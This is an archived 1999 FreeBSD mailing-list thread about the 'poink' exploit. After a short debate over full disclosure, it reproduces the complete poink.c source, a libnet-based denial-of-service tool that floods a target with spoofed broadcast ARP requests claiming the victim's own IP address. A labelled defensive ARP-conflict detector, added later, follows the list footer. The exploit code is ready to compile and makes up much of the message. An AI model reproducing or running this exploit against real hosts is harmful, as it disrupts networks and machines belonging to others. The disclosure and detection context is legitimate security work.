Date:      Mon, 19 Apr 1999 11:16:52 -0700
From:      "William" <wwoods@cybcon.com>
To:        <alpha@freebsd.org>
Subject:   Fw: poink and freebsd
Message-ID:  <199904191818.LAA11482@mail.cybcon.com>

----------
> From: Harold Gutch <logix@foobar.franken.de>
> To: Chris <freebsd@hiway1.exit109.com>; The Tech-Admin Dude <geniusj@phoenix.unacom.com>
> Cc: security@FreeBSD.ORG
> Subject: Re: poink and freebsd
> Date: Monday, April 19, 1999 10:54 AM
> 

On Mon, Apr 19, 1999 at 01:10:08PM -0400, Chris wrote:
> jd-
>
> id rather not post the source to the list, since this is how exploits get
> distributed, and bad things occur.  i sent email to the security-officer,
> and a few people to test it out with their setup.. id rather not
> distribute it any further... i hope you understand my reasoning behind it
> :/
>
> > On Mon, 19 Apr 1999, Robert Watson wrote:
> >
> > > On Mon, 19 Apr 1999, Chris wrote:
> > >
> > > > im sure ya'll have heard of poink, an exploit against freebsd/openbsd
> > > > machines (these are the boxes i have tested on) it appears to work very
> > > > efficiently in killing freebsd 3.1 - freebsd 3.0 machines, against one of
> > > > our freebsd 2.2.5 machines, it did bring up the error messages in
> > > > /var/log/messages (arp lookups) but didnt kill the machine like the
> > > > others...
> > > >
> > > > im just wondering if there are any patches for this, and i noticed there
> > > > is no mention of it on freebsd's website....
> > >
> > > Interestingly, I haven't heard about this one, and it doesn't appear to be
> > > on rootshell, etc.

Chris,

the fact that _you_ as somebody outside of the circles close to
the original author (which I simply assume) already have it,
shows that it already is public. Posting it to this list will
distribute it to more people, some of which might use it
maliciously, others though might fix it faster than it would be
fixed otherwise.
Keeping it secret doesn't help anything, this is similar to
proprietary programs/protocols, which in many cases are inferior
to open source or open protocols. You should get some information
about "full disclosure" and read it.

Anyway, I was able to find the source for poink after searching
for 5 minutes. As I don't have libnet installed (and I don't plan
to install it just to compile poink), I am not able to say
anything about what it does - perhaps somebody else can do so.

bye,
  Harold

-- 
<Shabby> Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar  4 04:53:33 CET 1998   #unix, ircnet

/*
 *  $Id$
 *
 *  poink.c - NT/9x DOS attack
 *
 *  Code:
 *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
 *                         route|daemon9 <route@infonexus.com>
 *  All rights reserved.
 *
 *  Original Idea:
 *  Joel Jacobson (joel@mobila.cx)
 *
 *  This simple exploit was written as per the specification from Joel
 *  Jacobson's bugtraq post (http://geek-girl.com/bugtraq/1999_1/1299.html).
 *
 *  Needs libnet 0.99.
 *  Currently:  http://lazy.accessus.net/~route/libnet
 *  Soon:       http://www.packetfactory.net/
 *
 *  gcc poink.c -o poink -lnet
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 */

#include <libnet.h>

u_char enet_src[6] = {0x00, 0x0d, 0x0e, 0x0a, 0x0d, 0x00};
u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};

int send_arp(struct link_int *, u_long, u_char *);
void usage(u_char *);

int
main(int argc, char *argv[])
{
    int c, amount;
    char errbuf[256];
    char *device = NULL;
    struct link_int *l;
    u_long ip;

    amount = 20;
    while ((c = getopt(argc, argv, "n:i:")) != EOF)
    {
        switch (c)
        {
            case 'i':
                device = optarg;
                break;
            case 'n':
                amount = atoi(optarg);
                break;
            default:
                exit(EXIT_FAILURE);
        }
    }

    if (!device)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    if (argc <= optind)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }
    else if ((ip = libnet_name_resolve(argv[optind], 1)) == -1)
    {
        fprintf(stderr, "Cannot resolve IP address\n");
        exit(EXIT_FAILURE);
    }

    l = libnet_open_link_interface(device, errbuf);
    if (!l)
    {
        fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }

    while (amount--)
    {
        c = send_arp(l, ip, device);
        if (c == -1)
        {
            /* bail on the first error */
            break;
        }
    }
    printf("\n");
    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}


int
send_arp(struct link_int *l, u_long ip, u_char *device)
{
    int n;
    u_char *buf;

    if (libnet_init_packet(ARP_H + ETH_H, &buf) == -1)
    {
        perror("libnet_init_packet memory:");
        exit(EXIT_FAILURE);
    }

    /*
     *  Ethernet header
     */
    libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_ARP, NULL, 0, buf);

    /*
     *  ARP header
     */
    libnet_build_arp(ARPHRD_ETHER,
        ETHERTYPE_IP,
        6,
        4,
        ARPOP_REQUEST,
        enet_src,
        (u_char *)&ip,
        enet_dst,
        (u_char *)&ip,
        NULL,
        0,
        buf + ETH_H);

    n = libnet_write_link_layer(l, device, buf, ARP_H + ETH_H);

    fprintf(stderr, ".");

    libnet_destroy_packet(&buf);
    return (n);
}


void
usage(u_char *name)
{
    fprintf(stderr, "%s -i interface [-n amount] ip\n", name);
}

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-alpha" in the body of the message
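
Added example, not part of the original message or of poink.c: a receiver-side check for the frame the attachment builds (a broadcast ARP request whose sender and target IP are both the target host's address, sent from a fixed MAC), with a limiter so that a burst produces a bounded number of reports. The host IP and MAC, the names classify_arp, should_log and replay, and the one-second limiter are assumptions made for illustration; the sample frame is constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum arp_verdict { ARP_OK, ARP_NOT_ARP, ARP_TRUNCATED, ARP_IP_CONFLICT };
/* Constructed sample: broadcast ARP request, sender IP == target IP ==
 * 192.0.2.10 (documentation range), sender MAC as hard-coded in poink.c. */
const uint8_t SAMPLE_FRAME[42] = {
    0xff,0xff,0xff,0xff,0xff,0xff, 0x00,0x0d,0x0e,0x0a,0x0d,0x00, 0x08,0x06,
    0x00,0x01, 0x08,0x00, 6, 4, 0x00,0x01, 0x00,0x0d,0x0e,0x0a,0x0d,0x00,
    192,0,2,10, 0xff,0xff,0xff,0xff,0xff,0xff, 192,0,2,10 };
const uint8_t HOST_IP[4]  = {192, 0, 2, 10};                        /* assumed */
const uint8_t HOST_MAC[6] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x01};   /* assumed */

/* Classify a raw Ethernet frame as seen by the host owning (my_ip, my_mac). */
enum arp_verdict classify_arp(const uint8_t *f, size_t len,
                              const uint8_t my_ip[4], const uint8_t my_mac[6])
{
    /* Fixed ARP prefix: htype=Ethernet, ptype=IPv4, hlen=6, plen=4 */
    static const uint8_t eth_ipv4[6] = {0x00, 0x01, 0x08, 0x00, 6, 4};
    if (len < 14) return ARP_TRUNCATED;
    if (f[12] != 0x08 || f[13] != 0x06) return ARP_NOT_ARP;  /* EtherType */
    if (len < 14 + 28) return ARP_TRUNCATED;
    if (memcmp(f + 14, eth_ipv4, 6) != 0) return ARP_NOT_ARP;
    const uint8_t *sha = f + 14 + 8, *spa = f + 14 + 14;
    /* Someone else's MAC claiming our IP is a conflict, whatever the opcode. */
    if (memcmp(spa, my_ip, 4) == 0 && memcmp(sha, my_mac, 6) != 0)
        return ARP_IP_CONFLICT;
    return ARP_OK;
}

/* Hypothetical limiter: report at most `burst` conflicts per second. */
struct log_limit { long window; unsigned burst, used, suppressed; };
int should_log(struct log_limit *ll, long now_sec)
{
    if (now_sec != ll->window) { ll->window = now_sec; ll->used = 0; }
    if (ll->used < ll->burst) { ll->used++; return 1; }
    ll->suppressed++;   /* counted, not reported */
    return 0;
}

/* Feed n copies of a frame within one second; return how many get reported. */
unsigned replay(const uint8_t *f, size_t len, unsigned n, struct log_limit *ll)
{
    unsigned reported = 0;
    for (unsigned i = 0; i < n; i++)
        if (classify_arp(f, len, HOST_IP, HOST_MAC) == ARP_IP_CONFLICT)
            reported += (unsigned)should_log(ll, 1000);
    return reported;
}
```

With a burst of 3, replaying the sample 20 times (the default count in poink.c) yields 3 reports and 17 suppressed.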